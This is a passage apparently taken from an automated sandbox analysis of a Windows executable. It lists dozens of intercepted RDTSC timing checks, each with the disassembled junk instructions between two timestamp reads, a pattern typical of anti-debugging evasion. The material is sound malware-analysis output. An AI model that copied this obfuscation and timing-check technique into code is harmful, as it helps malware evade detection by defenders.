                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D689C9 second address: D68A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F6999135DEEh 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F6999135DE6h 0x00000016 popad 0x00000017 pushad 0x00000018 jns 00007F6999135DEEh 0x0000001e jmp 00007F6999135DF4h 0x00000023 push eax 0x00000024 push edx 0x00000025 je 00007F6999135DE6h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D676F3 second address: D676F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D676F7 second address: D676FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67433 second address: D6743C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68170 second address: D68174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D682D9 second address: D682FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F699913D309h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D682FA second address: D682FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D682FF second address: D68304 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BDD4 second address: D6BDEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6999135DEDh 0x0000000c jg 00007F6999135DE6h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BDEF second address: D6BE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F699913D2F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EA81 second address: D6EA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F6999135DEFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EA9A second address: D6EAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EAA3 second address: D6EAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EAA7 second address: D6EAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F699913D2FDh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F699913D300h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71328 second address: D7135C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6999135DF0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6999135DF8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7135C second address: D71368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71368 second address: D7136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7136C second address: D71370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE570C second address: CE5727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5727 second address: CE572D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F34 second address: D70F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F6999135DFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F5C second address: D70F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F62 second address: D70F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F66 second address: D70F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F6C second address: D70F7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F6999135DE6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7109F second address: D710A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D710A8 second address: D710AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D710AD second address: D710B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D710B3 second address: D710BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6999135DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E78 second address: D75E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E7C second address: D75E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E82 second address: D75E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E8A second address: D75E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E8E second address: D75EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F699913D305h 0x00000014 pop esi 0x00000015 jc 00007F699913D2FCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75EC7 second address: D75ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6999135DECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75314 second address: D75323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75723 second address: D75747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F6999135DF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75A6A second address: D75A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78668 second address: D7868B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F6999135DF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7868B second address: D78698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F699913D2F6h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78698 second address: D7869E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78805 second address: D7881D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F699913D2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F699913D2FAh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EAA9 second address: D7EAAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D350 second address: D7D355 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D7EF second address: D7D7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D7F3 second address: D7D804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DDC0 second address: D7DDD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F6999135DEAh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86B9F second address: D86BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86BA5 second address: D86BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85188 second address: D851A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F699913D2FAh 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F699913D2F6h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D851A3 second address: D851AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6999135DEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D851AD second address: D851B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8544E second address: D85454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85DB3 second address: D85DDC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F699913D2F6h 0x00000008 jmp 00007F699913D2FFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F699913D2FBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85DDC second address: D85DF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6999135DE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6999135DEBh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AC03 second address: D8AC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B376 second address: D8B395 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6999135DF9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B395 second address: D8B39A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9782E second address: D97832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979A3 second address: D979B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979B1 second address: D979BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979BF second address: D979CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F699913D2F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979CB second address: D979EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979EC second address: D979FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F699913D2F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979FD second address: D97A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97A01 second address: D97A15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F699913D2FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97B5C second address: D97B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97B66 second address: D97B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F699913D2FFh 0x0000000f jmp 00007F699913D307h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97E06 second address: D97E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97E0E second address: D97E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9893E second address: D98959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F6999135DF1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B4EB second address: D9B507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FFh 0x00000007 jc 00007F699913D2F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA29DD second address: DA29F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6999135DEFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA29F2 second address: DA29F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEB79 second address: DAEB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4EEA second address: DB4F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F699913D308h 0x00000008 jo 00007F699913D2F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F699913D2F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4F16 second address: DB4F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70F1 second address: DB70F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70F9 second address: DB70FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70FD second address: DB711E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F699913D2FAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F699913D2FDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB711E second address: DB7123 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7231 second address: DB7241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8CC8 second address: DB8CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC864D second address: DC8652 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8520 second address: DC8534 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6999135DEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFB0E second address: DCFB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFC50 second address: DCFC78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEBh 0x00000007 jmp 00007F6999135DF0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f ja 00007F6999135DE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0131 second address: DD0143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0143 second address: DD0147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD02D7 second address: DD02DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4BA6 second address: DD4BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F6999135DF8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4BC9 second address: DD4BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6E57 second address: DD6E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F6999135DE6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6E69 second address: DD6E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD93BA second address: DD93BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD93BE second address: DD93C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD93C6 second address: DD93CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1315 second address: DE1319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1319 second address: DE1323 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6999135DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1323 second address: DE1351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F699913D302h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F699913D302h 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6870 second address: DE687B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F6999135DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7EC1 second address: DE7EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
